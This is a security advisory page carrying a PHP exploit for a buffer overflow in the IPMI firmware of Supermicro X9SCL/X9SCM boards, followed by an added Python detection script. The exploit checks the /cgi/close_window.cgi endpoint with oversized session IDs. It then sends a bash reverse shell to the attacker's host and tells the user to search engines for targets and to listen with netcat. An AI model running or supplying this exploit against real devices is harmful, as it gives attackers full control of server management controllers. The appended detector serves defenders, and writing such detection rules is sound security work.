
📄 Supermicro Onboard IPMI X9SCL / X9SCM SMT_X9_214 PHP Buffer Overflow

🗓️ 23 Feb 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news

PHP exploit for Supermicro IPMI SMT_X9_214 buffer overflow triggering reverse shell on vulnerable devices.

=============================================================================================================================================
    | # Title     : Supermicro Onboard IPMI X9SCL X9SCM with firmware SMT_X9_214 PHP Buffer Overflow                                            |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.supermicro.com                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking in Google or other search engine.
    
    [+] Code Description: This code is an exploit written in PHP, used to test and exploit the Buffer Overflow vulnerability in the Supermicro IPMI interface. 
    
        If the target is vulnerable to the attack (500 Internal Server Error), a Reverse Shell payload is sent to open a control shell on the target machine.
    
    [+] What's going on here?
    
        The target-ip and attacker (192.168.1.100:4444) are specified.
    
        Checks if the target is vulnerable (checkVulnerability()).
    
        If vulnerable, the Reverse Shell payload is sent.
    
    [+] Code Summary
    
       1. Sends an initial request to check for vulnerability.

       2. If the response is 500, a reverse connection command is sent via User-Agent.

       3. Once the command reaches the victim device, a connection is opened to the attacker.

       4. The attacker can now take full control of the device via nc -lvnp 4444.
    
    [+] save code as poc.php.
    
    [+] Set Target : line 80 // target ip

                     line 81 // Put your IP address

                     line 82 // Set the port you are listening on.
    
    [+] Usage : php poc.php

    [+] Payload :
    
    <?php
    
    class SupermicroExploit {
        private $target_url;
        private $attacker_ip;
        private $attacker_port;
    
        public function __construct($url, $ip, $port) {
            $this->target_url = rtrim($url, '/');
            $this->attacker_ip = $ip;
            $this->attacker_port = $port;
        }
    
        public function sendCloseWindowRequest($sess, $agent = null) {
            if (!$agent) {
                $agent = $this->randomString(8);
            }
    
            $headers = [
                "User-Agent: " . $this->randomString(16) . $agent
            ];
    
            $data = [
                'sess_sid' => $sess
            ];
    
            return $this->sendPostRequest("/cgi/close_window.cgi", $data, $headers);
        }
    
        private function sendPostRequest($path, $data, $headers = []) {
            $url = $this->target_url . $path;
            $options = [
                'http' => [
                    'header'  => implode("\r\n", $headers) . "\r\nContent-type: application/x-www-form-urlencoded",
                    'method'  => 'POST',
                    'content' => http_build_query($data),
                ]
            ];
    
            $context  = stream_context_create($options);
            return file_get_contents($url, false, $context);
        }
    
        public function checkVulnerability() {
            $safe_check = $this->randomString(20);
            $trigger_check = $this->randomString(132);
    
            $res = $this->sendCloseWindowRequest($safe_check);
    
            if (!$res || strpos($res, "Can't find action") === false) {
                return "Unknown";
            }
    
            $res = $this->sendCloseWindowRequest($trigger_check);
    
            if (!$res || strpos($res, "500") === false) {
                return "Safe";
            }
    
            return "Vulnerable";
        }
    
        private function randomString($length) {
            return substr(str_shuffle(str_repeat($x='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)))), 1, $length);
        }
    
        public function exploit() {
            echo "Target is vulnerable! Sending reverse shell...\n";
            $buffer = $this->generatePayload();
            $this->sendCloseWindowRequest($buffer);
        }
    
        private function generatePayload() {
            $payload = "bash -i >& /dev/tcp/{$this->attacker_ip}/{$this->attacker_port} 0>&1";
            return str_repeat("A", 8000 - strlen($payload)) . $payload;
        }
    }
    
    $target_ip = "http://target-ip";
    $attacker_ip = "192.168.1.100"; 
    $attacker_port = "4444"; 
    
    $exploit = new SupermicroExploit($target_ip, $attacker_ip, $attacker_port);
    $status = $exploit->checkVulnerability();
    echo "Target is: $status\n";
    
    if ($status === "Vulnerable") {
        $exploit->exploit();
    }
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
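
For defenders, the request pattern in the code above (a POST to /cgi/close_window.cgi whose sess_sid grows from 20 to 132 to 8000 characters, with a 500 response as the tell) can be matched in proxy or WAF captures. The following is an added detection example, not code from the advisory or from Supermicro; the 64-character threshold, the `bmc.example` host and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import parse_qs

TARGET_PATH = "/cgi/close_window.cgi"   # endpoint named in the advisory
# Assumption: a cut-off between the advisory's 20-char probe and 132-char trigger.
MAX_SESS_SID_LEN = 64

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers, body

def inspect(raw, status):
    """Return a finding for an oversized sess_sid on the endpoint, else None."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return None
    values = parse_qs(body, keep_blank_values=True).get("sess_sid", [])
    longest = max((len(v) for v in values), default=0)
    if longest <= MAX_SESS_SID_LEN:
        return None
    # A 500 right after an oversized value is the advisory's "vulnerable" signal.
    severity = "high" if status == 500 else "medium"
    return {"sess_sid_len": longest, "status": status, "severity": severity,
            "user_agent": headers.get("user-agent", "")}

def build(sess_sid, path=TARGET_PATH, method="POST"):
    """Construct a sample request (test data, not captured traffic)."""
    body = "sess_sid=" + sess_sid
    return (f"{method} {path} HTTP/1.1\r\nHost: bmc.example\r\n"
            "User-Agent: sample-client\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")

# Constructed (request, response status) pairs mirroring the lengths on the page.
SAMPLES = [(build("a" * 20), 200), (build("b" * 132), 500), (build("A" * 8000), 200)]

def scan(samples):
    return [f for f in (inspect(raw, status) for raw, status in samples) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The same length check works as a blocking rule on a reverse proxy placed in front of the BMC management network, which in any case should not be reachable from untrusted networks.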

23 Feb 2026 00:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 2: 10
EPSS: 0.8637